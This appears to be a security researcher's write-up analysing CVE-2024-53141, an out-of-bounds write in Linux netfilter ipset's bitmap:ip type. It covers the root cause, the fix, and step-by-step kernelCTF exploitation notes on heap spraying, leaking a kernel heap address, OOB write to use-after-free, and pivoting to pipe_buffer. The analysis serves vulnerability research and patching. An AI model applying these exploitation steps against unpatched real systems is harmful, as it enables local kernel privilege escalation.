CVE-2024-53141: an OOB Write Vulnerability in Netfilter Ipset

According to the latest kernelCTF rules, the nftables component in the Netfilter subsystem is disabled. However, certain components of Netfilter, such as ipset, remain enabled by default. CVE-2024-53141 is an out-of-bounds access vulnerability in ipset that was exploited during kernelCTF. The fix for this vulnerability can be found in this commit. In this post, I will analyze the root cause of the vulnerability and its exploitation.

1. Overview

The Netfilter ipset utility is used to manage sets of IP addresses, networks, and ports. It allows you to group multiple IP addresses, ranges, or networks into a single set for more efficient management.

Processes can interact with ipset through NETLINK, with supported commands and their handlers defined in the ip_set_netlink_subsys_cb[] variable. To use ipset, you first need to create a set using the IPSET_CMD_CREATE command [1]. Once the set is created, you can add new IP addresses using the IPSET_CMD_ADD command [2].

    static const struct nfnl_callback ip_set_netlink_subsys_cb[IPSET_MSG_MAX] = {
        // [...]
        [IPSET_CMD_CREATE] = { // [1]
            .call = ip_set_create,
            .type = NFNL_CB_MUTEX,
            .attr_count = IPSET_ATTR_CMD_MAX,
            .policy = ip_set_create_policy,
        },
        // [...]
        [IPSET_CMD_ADD] = { // [2]
            .call = ip_set_uadd,
            .type = NFNL_CB_MUTEX,
            .attr_count = IPSET_ATTR_CMD_MAX,
            .policy = ip_set_adt_policy,
        },
        // [...]
    };
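
As a rough illustration of how a request reaches one of these handlers: nfnetlink packs the subsystem ID into the high byte of nlmsg_type and the command into the low byte, and the command indexes the callback table. The sketch below mirrors that packing in user space. The MODEL_* constants are copies of the UAPI values as I understand them (NFNL_SUBSYS_IPSET = 6, IPSET_CMD_CREATE = 2, IPSET_CMD_ADD = 9), and the helper names are made up for this example.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed copies of the kernel UAPI values (linux/netfilter/nfnetlink.h and
 * linux/netfilter/ipset/ip_set.h). Prefer the real headers in actual code. */
enum { MODEL_NFNL_SUBSYS_IPSET = 6 };
enum { MODEL_IPSET_CMD_CREATE = 2, MODEL_IPSET_CMD_ADD = 9 };

/* Hypothetical helper: subsystem in the high byte, command in the low byte. */
static uint16_t nfnl_msg_type(uint8_t subsys, uint8_t cmd)
{
	return (uint16_t)((subsys << 8) | cmd);
}

/* Hypothetical helpers: split nlmsg_type back into its two halves. */
static uint8_t nfnl_subsys_id(uint16_t type) { return (uint8_t)(type >> 8); }
static uint8_t nfnl_cmd(uint16_t type) { return (uint8_t)(type & 0xff); }

/* Usage: the type carried by an ADD request, and how it is split again. */
static void nfnl_type_example(void)
{
	uint16_t type = nfnl_msg_type(MODEL_NFNL_SUBSYS_IPSET, MODEL_IPSET_CMD_ADD);

	assert(nfnl_subsys_id(type) == MODEL_NFNL_SUBSYS_IPSET);
	assert(nfnl_cmd(type) == MODEL_IPSET_CMD_ADD);
}
```

With these values, a CREATE request carries nlmsg_type 0x0602 and an ADD request 0x0609.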

The IPSET_CMD_CREATE command is handled by the ip_set_create() function. It first allocates an ip_set object [3], finds the appropriate type ops based on typename [4], and then invokes the type-specific creation handler [5]. Next, it locates an available set slot within the network object [6], and finally stores the newly created ip_set object in the network object [7].

    #define ip_set(inst, id) \
        ip_set_dereference(inst)[id]

    static int ip_set_create(struct sk_buff *skb, const struct nfnl_info *info,
                             const struct nlattr * const attr[])
    {
        struct ip_set_net *inst = ip_set_pernet(info->net);
        struct ip_set *set, *clash = NULL;

        name = nla_data(attr[IPSET_ATTR_SETNAME]);
        typename = nla_data(attr[IPSET_ATTR_TYPENAME]);
        family = nla_get_u8(attr[IPSET_ATTR_FAMILY]);
        revision = nla_get_u8(attr[IPSET_ATTR_REVISION]);
        // [...]
        set = kzalloc(sizeof(*set), GFP_KERNEL); // [3]
        strscpy(set->name, name, IPSET_MAXNAMELEN);
        // [...]
        ret = find_set_type_get(typename, family, revision, &set->type); // [4]
        ret = set->type->create(info->net, set, tb, flags); // [5]
        ret = find_free_id(inst, set->name, &index, &clash); // [6]
        // [...]
        ip_set(inst, index) = set; // [7]
        return ret;
    }

After creating a set, we can use the IPSET_CMD_ADD command to add an IP address to it. The kernel handles the ADD request through the ip_set_uadd() function.

    static int ip_set_uadd(struct sk_buff *skb, const struct nfnl_info *info,
                           const struct nlattr * const attr[])
    {
        return ip_set_ad(info->net, info->sk, skb,
                         IPSET_ADD, info->nlh, attr, info->extack);
    }

The ip_set_ad() function is then called. It first retrieves the ip_set object from the network object using the set name [8] and subsequently invokes the call_ad() function [9]. The call_ad() function acquires the set lock and calls the set's ->variant->uadt (user-level add, delete, test) handler [10].

    static int ip_set_ad(struct net *net, struct sock *ctnl,
                         struct sk_buff *skb,
                         enum ipset_adt adt,
                         const struct nlmsghdr *nlh,
                         const struct nlattr * const attr[],
                         struct netlink_ext_ack *extack)
    {
        struct ip_set *set;

        set = find_set(inst, nla_data(attr[IPSET_ATTR_SETNAME])); // [8]
        // [...]
        nla_parse_nested(tb, IPSET_ATTR_ADT_MAX,
                         attr[IPSET_ATTR_DATA],
                         set->type->adt_policy, NULL);
        ret = call_ad(net, ctnl, skb, set, tb, adt, flags, // [9]
                      use_lineno);
        // [...]
    }

    static int
    call_ad(struct net *net, struct sock *ctnl, struct sk_buff *skb,
            struct ip_set *set, struct nlattr *tb[], enum ipset_adt adt,
            u32 flags, bool use_lineno)
    {
        // [...]
        do {
            ip_set_lock(set);
            ret = set->variant->uadt(set, tb, adt, &lineno, flags, retried); // [10]
            ip_set_unlock(set);
            retried = true;
        } while (/*...*/);
        // [...]
    }

2. Bitmap IP

“bitmap:ip” is a set type that stores individual IP addresses within a specified range using a bitmap. When processing the IPSET_CMD_CREATE command, the bitmap_ip_create() function is invoked to create a “bitmap:ip” set.

    static struct ip_set_type bitmap_ip_type __read_mostly = {
        .name = "bitmap:ip",
        // [...]
        .create = bitmap_ip_create,
        // [...]
    };

This function calculates the number of elements based on the user-provided IP range [1], allocates memory for the bitmap [2], and binds it to the set [3]. Additionally, it assigns the &bitmap_ip variable to the set’s ->variant member.

    static int
    bitmap_ip_create(struct net *net, struct ip_set *set, struct nlattr *tb[],
                     u32 flags)
    {
        ret = ip_set_get_hostipaddr4(tb[IPSET_ATTR_IP], &first_ip);
        // [...]
        if (tb[IPSET_ATTR_IP_TO]) {
            ret = ip_set_get_hostipaddr4(tb[IPSET_ATTR_IP_TO], &last_ip);
            // [...]
        }
        if (tb[IPSET_ATTR_NETMASK]) {
            netmask = nla_get_u8(tb[IPSET_ATTR_NETMASK]);
            // [...]
        }
        mask = range_to_mask(first_ip, last_ip, &mask_bits);
        elements = 2UL << (netmask - mask_bits - 1); // [1]
        // [...]
        map = ip_set_alloc(sizeof(*map) + elements * set->dsize); // [2]
        map->memsize = BITS_TO_LONGS(elements) * sizeof(unsigned long);
        set->variant = &bitmap_ip;
        init_map_ip(set, map, first_ip, last_ip, elements, hosts, netmask);
        // [...]
    }

    static bool
    init_map_ip(struct ip_set *set, struct bitmap_ip *map,
                u32 first_ip, u32 last_ip,
                u32 elements, u32 hosts, u8 netmask)
    {
        // [...]
        map->set = set;
        set->data = map; // [3]
        // [...]
    }

You might not find the definition of the &bitmap_ip variable by simply grepping for its name. This is because the kernel source wraps it in macros: the variable is written as mtype in the source code, and mtype expands to bitmap_ip.

    // net/netfilter/ipset/ip_set_bitmap_ip.c
    #define MTYPE bitmap_ip

    // net/netfilter/ipset/ip_set_bitmap_gen.h
    #define mtype MTYPE

    static const struct ip_set_type_variant mtype = {
        // [...]
        .uadt = mtype_uadt,
        .adt = {
            [IPSET_ADD] = mtype_add,
            [IPSET_DEL] = mtype_del,
            [IPSET_TEST] = mtype_test,
        },
        // [...]
    };
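
The aliasing trick can be reproduced in a few lines of standalone C. This is only a sketch of the pattern: struct variant, CONCAT and the function body are hypothetical stand-ins, not the kernel's definitions. The point is that the source text never spells bitmap_ip or bitmap_ip_uadt at the definition site, yet both symbols exist after preprocessing.

```c
#include <assert.h>

/* Hypothetical, trimmed-down stand-in for struct ip_set_type_variant. */
struct variant {
	int (*uadt)(int arg);
};

/* "Set type" file: choose the concrete name. */
#define MTYPE bitmap_ip

/* "Generic" header: everything is written against lowercase aliases. */
#define CONCAT_(a, b) a##b
#define CONCAT(a, b) CONCAT_(a, b)	/* extra level so MTYPE expands first */
#define mtype MTYPE
#define mtype_uadt CONCAT(MTYPE, _uadt)

/* After preprocessing this defines bitmap_ip_uadt(). */
static int mtype_uadt(int arg)
{
	return arg + 1;
}

/* After preprocessing this defines the variable bitmap_ip. */
static const struct variant mtype = {
	.uadt = mtype_uadt,
};

/* Usage: code elsewhere can refer to the expanded names directly. */
static void alias_example(void)
{
	assert(bitmap_ip.uadt == bitmap_ip_uadt);
}
```

Running the file through the preprocessor only (for example with cc -E) shows the expanded names, which is often the quickest way to find such definitions.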

The bitmap_ip_uadt() function (referred to as mtype_uadt() in the source code) is invoked when an IPSET_CMD_ADD request is sent to a “bitmap:ip” set.

Since the bitmap is allocated at creation time and its size is fixed, this function must verify that the new IP falls within the set's range [4]. If the IPSET_ATTR_IP_TO attribute is provided and ip is greater than ip_to, the two values are swapped so that ip is the start of the range and ip_to its end. Only in that case is the new ip (the original ip_to) checked against map->first_ip [5].

If the attribute IPSET_ATTR_CIDR is provided, this function sets the CIDR mask (Classless Inter-Domain Routing) on the target IP using the ip_set_mask_from_to() function [6].

Following this, it validates that the ip_to value does not exceed map->last_ip [7], the original end of the IP range.

    #define ip_set_mask_from_to(from, to, cidr) \
    do { \
        from &= ip_set_hostmask(cidr); \
        to = from | ~ip_set_hostmask(cidr); \
    } while (0)

    static int
    bitmap_ip_uadt(struct ip_set *set, struct nlattr *tb[],
                   enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
    {
        ipset_adtfn adtfn = set->variant->adt[adt];
        // [...]
        ret = ip_set_get_hostipaddr4(tb[IPSET_ATTR_IP], &ip);
        // [...]
        if (ip < map->first_ip || ip > map->last_ip) // [4]
            return -IPSET_ERR_BITMAP_RANGE;

        if (tb[IPSET_ATTR_IP_TO]) {
            ret = ip_set_get_hostipaddr4(tb[IPSET_ATTR_IP_TO], &ip_to);
            if (ip > ip_to) {
                swap(ip, ip_to);
                if (ip < map->first_ip) // [5]
                    return -IPSET_ERR_BITMAP_RANGE;
            }
        } else if (tb[IPSET_ATTR_CIDR]) {
            u8 cidr = nla_get_u8(tb[IPSET_ATTR_CIDR]);
            // [...]
            ip_set_mask_from_to(ip, ip_to, cidr); // [6]
        } /* ... */

        if (ip_to > map->last_ip) // [7]
            return -IPSET_ERR_BITMAP_RANGE;

        for (; !before(ip_to, ip); ip += map->hosts) {
            e.id = ip_to_id(map, ip);
            ret = adtfn(set, &e, &ext, &ext, flags); // [8]
            // [...]
        }
    }
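
To make the effect of ip_set_mask_from_to() concrete, here is a small user-space model of it. The hostmask() helper is a hypothetical stand-in for ip_set_hostmask() and assumes it returns a host-order mask with the top cidr bits set. The input values are the ones used later in the exploitation notes.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical stand-in for ip_set_hostmask(): host-order IPv4 mask with
 * the top `cidr` bits set. */
static uint32_t hostmask(uint8_t cidr)
{
	assert(cidr <= 32);
	/* A 32-bit shift by 32 is undefined in C, so handle /0 explicitly. */
	return cidr == 0 ? 0 : (uint32_t)(UINT32_MAX << (32 - cidr));
}

/* Function form of the macro: round *from down to the start of its /cidr
 * block and set *to to the last address of that block. */
static void mask_from_to(uint32_t *from, uint32_t *to, uint8_t cidr)
{
	*from &= hostmask(cidr);
	*to = *from | ~hostmask(cidr);
}

/* Usage: ip = 0xffffffff with a /3 prefix. */
static void mask_example(void)
{
	uint32_t ip = 0xffffffffu, ip_to = 0;

	mask_from_to(&ip, &ip_to, 3);
	assert(ip == 0xe0000000u);	/* start moved far below the original ip */
	assert(ip_to == 0xffffffffu);	/* end of the /3 block */
}
```

Note that masking can only lower the start address, so an ip that passed the range check at [4] can end up below map->first_ip afterwards.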

Finally, it invokes the mtype_add() function [8], the ADD handler, to set the corresponding bit for the IP in the bitmap [9].

    static int
    mtype_add(struct ip_set *set, void *value, const struct ip_set_ext *ext,
              struct ip_set_ext *mext, u32 flags)
    {
        // [...]
        set_bit(e->id, map->members); // [9]
        set->elements++;
    }

3. Root Cause

The patch is quite straightforward: it moves the lower-bound check out of one branch of the if-else chain and places it after the entire chain, so that every branch is covered by the check.

             ret = ip_set_get_hostipaddr4(tb[IPSET_ATTR_IP_TO], &ip_to);
             if (ret)
                 return ret;
    -        if (ip > ip_to) {
    +        if (ip > ip_to)
                 swap(ip, ip_to);
    -            if (ip < map->first_ip)
    -                return -IPSET_ERR_BITMAP_RANGE;
    -        }
         } else if (tb[IPSET_ATTR_CIDR]) {
             u8 cidr = nla_get_u8(tb[IPSET_ATTR_CIDR]);
             // [...]
    -    if (ip_to > map->last_ip)
    +    if (ip < map->first_ip || ip_to > map->last_ip)
             return -IPSET_ERR_BITMAP_RANGE;

When the IPSET_ATTR_CIDR attribute is used, ip_set_mask_from_to() clears the host bits of ip, so the ip value can only decrease and may fall below map->first_ip. Before the patch, nothing rechecked the lower bound on this path. The ip_to_id() function [1] then computes ip - m->first_ip, which wraps around and yields an incorrect element ID, leading to an out-of-bounds write when setting the bitmap [2].

    #define ip_set_mask_from_to(from, to, cidr) \
    do { \
        from &= ip_set_hostmask(cidr); \
        to = from | ~ip_set_hostmask(cidr); \
    } while (0)

    static u32
    ip_to_id(const struct bitmap_ip *m, u32 ip)
    {
        return ((ip & ip_set_hostmask(m->netmask)) - m->first_ip) / m->hosts;
    }

    static int
    bitmap_ip_uadt(struct ip_set *set, struct nlattr *tb[],
                   enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
    {
        // [...]
        else if (tb[IPSET_ATTR_CIDR]) {
            u8 cidr = nla_get_u8(tb[IPSET_ATTR_CIDR]);
            ip_set_mask_from_to(ip, ip_to, cidr);
        } /* ... */
        // [...]
        if (ip_to > map->last_ip)
        // if (ip < map->first_ip || ip_to > map->last_ip)
            return -IPSET_ERR_BITMAP_RANGE;

        for (; !before(ip_to, ip); ip += map->hosts) {
            e.id = ip_to_id(map, ip); // [1]
            ret = adtfn(set, &e, &ext, &ext, flags); // [2]
            // [...]
        }
    }
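
The difference between the two checks, and the wrap-around in ip_to_id(), can be reproduced with a simplified user-space model. The struct and function names below are hypothetical, and the model assumes netmask == 32 so that the masking in ip_to_id() is a no-op. The values are the ones from section 4.3.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Simplified model of struct bitmap_ip: only the fields the checks use. */
struct range_model {
	uint32_t first_ip;
	uint32_t last_ip;
	uint32_t hosts;
};

/* Mirrors ip_to_id() for netmask == 32; the subtraction wraps modulo 2^32. */
static uint32_t model_ip_to_id(const struct range_model *m, uint32_t ip)
{
	assert(m->hosts != 0);
	return (ip - m->first_ip) / m->hosts;
}

/* Pre-patch check on the CIDR path: only the upper bound is tested. */
static bool range_ok_before_patch(const struct range_model *m,
				  uint32_t ip, uint32_t ip_to)
{
	(void)ip;	/* the lower bound is never looked at */
	return ip_to <= m->last_ip;
}

/* Post-patch check: both bounds are tested after the if-else chain. */
static bool range_ok_after_patch(const struct range_model *m,
				 uint32_t ip, uint32_t ip_to)
{
	return ip >= m->first_ip && ip_to <= m->last_ip;
}
```

For first_ip = 0xffffffcb, last_ip = 0xffffffff and the masked range 0xe0000000 to 0xffffffff, the pre-patch check passes, the post-patch check rejects the request, and the model ID is 0xe0000035, which truncates to 0x35 when stored in a 16-bit field.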

4. Exploitation

You can find more details about the exploitation in the author’s commit on google/security-research. I’ve only included some brief notes here.

4.1. Unix Socket Memory Spraying

- Create 0x400 unix socket pairs
  - Set their send buffer size and receive buffer size to 0x400000 (a sufficiently large value).
    - SO_SNDBUF: sk->sk_sndbuf will be set to 0x68000.
    - SO_RCVBUF: sk->sk_rcvbuf will also be set to 0x68000 via the function __sock_set_rcvbuf().
- Send 0x200 bytes of data to both sockets of each pair
  - The function call flow is as follows: unix_stream_sendmsg() ---> sock_alloc_send_pskb() ---> alloc_skb_with_frags()
  - Ultimately, __alloc_skb() allocates an skb object from skbuff_head_cache and a data buffer via kmalloc_reserve().
    - An skb data buffer of size 0x200 will be allocated from kmalloc-cg-1k.

4.2. Setup Exploitation Environment

- Enter a new namespace
  - This step is required to trigger the vulnerability.
- Allocate 0x4000 msg queues
  - These are used for msg_msg spraying.
- Create 0x100 socket pairs
  - These socket pairs will be used as part of the exploit setup.

4.3. OOB Write To Leak Kheap

- Create a ip_set object with comment attribute

- With the following attributes:

IPSET_ATTR_IP= 0xffffffcb (first_ip)IPSET_ATTR_IP_TO= 0xffffffff (last_ip)

- This ip_set is created with

IPSET_ATTR_CADT_FLAGSset to 16, matching theip_set_extensions[3].flagvalueIPSET_FLAG_WITH_COMMENT. - The creation process follows:

static int bitmap_ip_create(struct net *net, struct ip_set *set, struct nlattr *tb[], u32 flags) { struct bitmap_ip *map; // [...] set->dsize = ip_set_elem_len(set, tb, 0, 0); // 0x8, comment length map = ip_set_alloc(sizeof(*map) + elements * set->dsize); // 0x58 + 0x8 * 53 == 512, kmalloc-cg-512 // [...] } static bool init_map_ip(struct ip_set *set, struct bitmap_ip *map, u32 first_ip, u32 last_ip, u32 elements, u32 hosts, u8 netmask) { map->members = bitmap_zalloc(elements, GFP_KERNEL | __GFP_NOWARN); // 8, kmalloc-8 // [...] }

- With the following attributes:

- Add IP 0xffffffff to the vulnerable ip_set and trigger the vulnerability

- Use the following attributes:

IPSET_ATTR_CIDR= 3, making theipvalue become 0xe0000000 (smaller thanmap->first_ip).IPSET_ATTR_COMMENTwith a string of length 0x90.

- If

ipvalue is 0xe0000000, theip_to_id()inbitmap_ip_uadt()function will return a ID that is out of range.static u32 ip_to_id(const struct bitmap_ip *m, u32 ip) { return ((ip /* 0xe0000000 */ & ip_set_hostmask(m->netmask) /* 0xffffffff */) - m->first_ip /* 0xffffffcb */) / m->hosts /* 1 */; }- The calculated value 0xe0000035 is then casted to

u16, ending up with the final value of 0x35.

- The calculated value 0xe0000035 is then casted to

- This triggers

bitmap_ip_add()(also namedmtype_add()), resulting in abnormal element IDs (from 0x35).#define get_ext(set, map, id) ((map)->extensions + ((set)->dsize * (id))) static int mtype_add(struct ip_set *set, void *value, const struct ip_set_ext *ext, struct ip_set_ext *mext, u32 flags) { struct mtype *map = set->data; const struct mtype_adt_elem *e = value; void *x = get_ext(set, map, e->id); // [...] if (SET_WITH_COMMENT(set)) ip_set_init_comment(set, ext_comment(x, set), ext); // [...] } - The kernel gets comment extension element from out-of-bounds memory and assigns the newly allocated comment buffer to it.

void ip_set_init_comment(struct ip_set *set, struct ip_set_comment *comment, const struct ip_set_ext *ext) { struct ip_set_comment_rcu *c; // [...] c = kmalloc(sizeof(*c) + len + 1, GFP_ATOMIC); // 16 + 144 + 1 == 151, kmalloc-192 strscpy(c->str, ext->comment, len + 1); // [...] rcu_assign_pointer(comment->c, c); }

- Use the following attributes:



- Spray

skbbuffers of size 0x80- Before and after creating the vulnerable ip_set, perform

skbspraying.- Allocate

skbdata buffer of size 0x80 fromkmalloc-cg-512.

- Allocate

- This ensures that the the OOB extension element and the skb buffers share the same slab.

- Before and after creating the vulnerable ip_set, perform

- Read

skbdata to retrieve comment pointer- By reading the

skbdata, there is a high probability of geting a buffer data containing the comment string pointer allocated in step 3.

- By reading the

After that, the heap layout should be like:

4.4. Control The OOB Access

However, the OOB access does not stop after the first element: the loop keeps running as the ip value progresses from 0xe0000000 to the end value of 0xffffffff, potentially accessing invalid memory regions or corrupting the kernel heap. To prevent such side effects, it is crucial to find a way to stop the iteration.

In the bitmap_ip_uadt() function, if the adtfn() call returns -IPSET_ERR_EXIST and IPSET_FLAG_EXIST is not set in flags, the IP iteration loop returns early [1].

    static inline bool
    ip_set_eexist(int ret, u32 flags)
    {
        return ret == -IPSET_ERR_EXIST && (flags & IPSET_FLAG_EXIST);
    }

    static int
    bitmap_ip_uadt(struct ip_set *set, struct nlattr *tb[],
                   enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
    {
        // [...]
        for (; !before(ip_to, ip); ip += map->hosts) {
            e.id = ip_to_id(map, ip);
            ret = adtfn(set, &e, &ext, &ext, flags);
            if (ret && !ip_set_eexist(ret, flags)) // [1]
                return ret;
            // [...]
        }
    }

If the corresponding bit of the IP is already set in the bitmap [2], the mtype_do_add() function will return 1 (the IPSET_ADD_FAILED macro value), causing mtype_add() to return -IPSET_ERR_EXIST [3].

    static int
    bitmap_ip_do_add(const struct bitmap_ip_adt_elem *e, struct bitmap_ip *map,
                     u32 flags, size_t dsize)
    {
        return !!test_bit(e->id, map->members); // [2]
    }

    static int
    mtype_add(struct ip_set *set, void *value, const struct ip_set_ext *ext,
              struct ip_set_ext *mext, u32 flags)
    {
        struct mtype *map = set->data;
        const struct mtype_adt_elem *e = value;
        int ret = mtype_do_add(e, map, flags, set->dsize);

        if (ret == IPSET_ADD_FAILED /* 1 */) {
            // [...]
            else if (!(flags & IPSET_FLAG_EXIST)) {
                set_bit(e->id, map->members);
                return -IPSET_ERR_EXIST; // [3]
            }
        }
        // [...]
    }



So we spray many ip_set objects and set the first bit of their bitmaps by the following two steps:

- Create 0x1000 ip_set objects

- Each ip_set is created with the following attributes:

IPSET_ATTR_IP= 0xffffffcb (first_ip)IPSET_ATTR_IP_TO= 0xffffffff (last_ip)IPSET_ATTR_CADT_FLAGS= 0x0 (no extension)

- Each ip_set is created with the following attributes:

- Add IP 0xffffffff to each ip_set

- Each IP add request is sent with the following attributes:

IPSET_ATTR_IP= 0xffffffcb (ip)IPSET_ATTR_IP_TO= 0xffffffcb (ip_to)

- This operation sets the first bit of the bitmap.

- Each IP add request is sent with the following attributes:

After spraying, the vulnerable ip_set object will terminate execution in the OOB iteration loop when the ip value reaches the next bitmap, as illustrated below:

Finally, the iteration loop will terminate when the element IDs reach 0x40.
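
The stopping behavior can be modeled in user space. The sketch below is a simplification under stated assumptions: two adjacent kmalloc-8 objects are represented as two consecutive 64-bit words, the first being the vulnerable set's (empty) bitmap and the second a sprayed bitmap whose first bit is set. The function names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define BITS_PER_WORD 64u

/* Test one bit in an array of 64-bit words, in the spirit of test_bit(). */
static bool bit_is_set(const uint64_t *words, uint32_t id)
{
	return (words[id / BITS_PER_WORD] >> (id % BITS_PER_WORD)) & 1;
}

static void bit_set(uint64_t *words, uint32_t id)
{
	words[id / BITS_PER_WORD] |= (uint64_t)1 << (id % BITS_PER_WORD);
}

/*
 * Model of the add loop without IPSET_FLAG_EXIST: walk IDs upward from
 * start_id, set every clear bit, and stop at the first bit that is already
 * set (where mtype_add() would return -IPSET_ERR_EXIST).
 * Returns the ID at which the walk stops, or nwords * 64 if it never does.
 */
static uint32_t oob_walk_stop_id(uint64_t *words, uint32_t nwords,
				 uint32_t start_id)
{
	uint32_t limit = nwords * BITS_PER_WORD;

	for (uint32_t id = start_id; id < limit; id++) {
		if (bit_is_set(words, id))
			return id;
		bit_set(words, id);
	}
	return limit;
}

/* Usage: IDs 0x35..0x3f land in the victim's own word, 0x40 hits the spray. */
static void walk_example(void)
{
	uint64_t heap[2] = { 0, 1 };

	assert(oob_walk_stop_id(heap, 2, 0x35) == 0x40);
}
```

In this model the walk touches eleven IDs (0x35 through 0x3f) that still fall inside the 8-byte bitmap allocation, then stops at 0x40 because that bit belongs to a sprayed neighbor.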

4.5. OOB Write To UAF

- Set up the kernel heap as same as described in section ‘4.4. Controlling the OOB Access’

- Create the ip_set with counter attribute

- This ip_set is created with

IPSET_ATTR_CADT_FLAGSset to 8, matching theip_set_extensions[0].flagvalueIPSET_FLAG_WITH_COUNTERS. - The creation process follows:

static int bitmap_ip_create(struct net *net, struct ip_set *set, struct nlattr *tb[], u32 flags) { struct bitmap_ip *map; // [...] set->dsize = ip_set_elem_len(set, tb, 0, 0); // 0x10, counter length map = ip_set_alloc(sizeof(*map) + elements * set->dsize); // 0x58 + 0x10 * 64 == 1112, kmalloc-cg-2k // [...] }

- This ip_set is created with

- Add IP 0xffffffff to the ip_set and trigger the vulnerability

- Use the following attributes:

IPSET_ATTR_CIDR= 3, making theipvalue become 0xe0000000 (smaller thanmap->first_ip).IPSET_ATTR_PACKETS, guessedpipe_buf_addr

- The first ID value 0xe0000040 is then casted to

u16, ending up with the final value of 0x40. - This triggers

bitmap_ip_add(), resulting in abnormal element IDs (from 0x40):#define get_ext(set, map, id) ((map)->extensions + ((set)->dsize * (id))) static int mtype_add(struct ip_set *set, void *value, const struct ip_set_ext *ext, struct ip_set_ext *mext, u32 flags) { struct mtype *map = set->data; const struct mtype_adt_elem *e = value; void *x = get_ext(set, map, e->id); // [...] if (SET_WITH_COUNTER(set)) ip_set_init_counter(ext_counter(x, set), ext); // [...] } - The kernel gets counter extension element from out-of-bounds memory and assigns it to arbitrary value.

static inline void ip_set_init_counter(struct ip_set_counter *counter, const struct ip_set_ext *ext) { if (ext->bytes != ULLONG_MAX) atomic64_set(&(counter)->bytes, (long long)(ext->bytes)); if (ext->packets != ULLONG_MAX) atomic64_set(&(counter)->packets, (long long)(ext->packets)); } - We write the kheap address with a const offset to the counter element, and it is highly likely that the address corresponds to one of

skbdata buffers allocated in section ‘4.1. Unix Socket Memory Spraying’.

- Use the following attributes:



- Spray

msg_msgobjects with memory size 0x1800- Before and after creating the vulnerable ip_set, perform

msg_msgspraying. - The

sys_msgsndcallsalloc_msg()to allocate a buffer for storing message data. However, eachstruct msg_msgobject is restricted to a maximum size of 0x1000, including its metadata [1]. If the requested size exceeds 0x1000, additionalstruct msg_msgsegobjects are created [2] to store the remaining data.#define DATALEN_MSG ((size_t)PAGE_SIZE-sizeof(struct msg_msg)) #define DATALEN_SEG ((size_t)PAGE_SIZE-sizeof(struct msg_msgseg)) static struct msg_msg *alloc_msg(size_t len) { struct msg_msg *msg; struct msg_msgseg **pseg; size_t alen; alen = min(len, p); // [1] msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); len -= alen; pseg = &msg->next; while (len > 0) { struct msg_msgseg *seg; alen = min(len, DATALEN_SEG); seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT); // [2] *pseg = seg; seg->next = NULL; pseg = &seg->next; len -= alen; } return msg; } - We spray

struct msg_msgobjects with memory size of 0x1800 (including object metadata), and the kernel will allocate two memory chunks:- A

struct msg_msgof size 0x1000 in thekmalloc-cg-4k. - A

struct msg_msgsegof size 0x800 in thekmalloc-cg-2k.

- A

- The

struct msg_msgsegobjects will share the samekmalloc-cg-2kslab as the bitmap.- This allows the OOB write to target one of the

struct msg_msgsegobjects.

- This allows the OOB write to target one of the

- Before and after creating the vulnerable ip_set, perform

- Free

msg_msgobjects- The

sys_msgrcvcallsfree_msg()to traverse themsg_msgobject and its->nextlinked list, releasing all associated memory.void free_msg(struct msg_msg *msg) { struct msg_msgseg *seg; seg = msg->next; kfree(msg); while (seg != NULL) { struct msg_msgseg *tmp = seg->next; kfree(seg); seg = tmp; } } - This causes the

skbdata buffer, which is pointed by the OOB writtenmsg_msgseg, to be freed, leading toskbUAF primitive.

- The





After spraying, the heap would be like:

After trigger OOB write, the heap would be like:

After receiving all messages (msg_msg and msg_msgseg), the heap would be like:
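
The msg_msg / msg_msgseg split used for the spray can be checked with a small model of alloc_msg(). The header sizes below are assumptions for x86-64 (0x30 bytes for struct msg_msg, 8 bytes for struct msg_msgseg, 4 KiB pages), and the struct and function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* Assumed x86-64 values; the kernel derives them from PAGE_SIZE and sizeof(). */
#define MODEL_PAGE_SIZE 0x1000u
#define MODEL_MSG_HDR   0x30u	/* assumed sizeof(struct msg_msg) */
#define MODEL_SEG_HDR   0x08u	/* assumed sizeof(struct msg_msgseg) */

struct msg_split {
	size_t head_alloc;	/* bytes requested for the struct msg_msg chunk */
	size_t last_seg_alloc;	/* bytes requested for the last segment, 0 if none */
	size_t nsegs;		/* number of msg_msgseg chunks */
};

/* Follows the same min()/loop structure as alloc_msg(), sizes only. */
static struct msg_split model_alloc_msg(size_t len)
{
	const size_t datalen_msg = MODEL_PAGE_SIZE - MODEL_MSG_HDR;
	const size_t datalen_seg = MODEL_PAGE_SIZE - MODEL_SEG_HDR;
	struct msg_split s = { 0, 0, 0 };
	size_t alen = len < datalen_msg ? len : datalen_msg;

	s.head_alloc = MODEL_MSG_HDR + alen;
	len -= alen;
	while (len > 0) {
		alen = len < datalen_seg ? len : datalen_seg;
		s.last_seg_alloc = MODEL_SEG_HDR + alen;
		s.nsegs++;
		len -= alen;
	}
	return s;
}

/* Usage: 0x1800 bytes in total means 0x1800 - 0x30 - 0x8 bytes of payload. */
static void msg_split_example(void)
{
	struct msg_split s = model_alloc_msg(0x1800 - MODEL_MSG_HDR - MODEL_SEG_HDR);

	assert(s.head_alloc == 0x1000 && s.last_seg_alloc == 0x800 && s.nsegs == 1);
}
```

Under these assumptions a payload of 0x17c8 bytes produces exactly one 0x1000-byte chunk and one 0x800-byte segment.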

4.6. Pivot UAF to pipe_buffer

- Spray pipes to reclaim the UAF object from kmalloc-cg-1k
  - When handling sys_pipe, the alloc_pipe_info() function is called to allocate a pipe_buffer array from kmalloc-cg-1k for pipe->bufs.

        struct pipe_inode_info *alloc_pipe_info(void)
        {
            unsigned long pipe_bufs = PIPE_DEF_BUFFERS; // 16
            // [...]
            pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
            // [...]
            pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer), // 16 * 40 == 0x280, kmalloc-cg-1k
                                 GFP_KERNEL_ACCOUNT);
            // [...]
        }

  - The UAF skb data buffer now overlaps with the struct pipe_buffer array.
- Write data to the pipe to populate pipe_buffer elements
  - The pipe_buffer object is initialized only after data is written into the pipe.

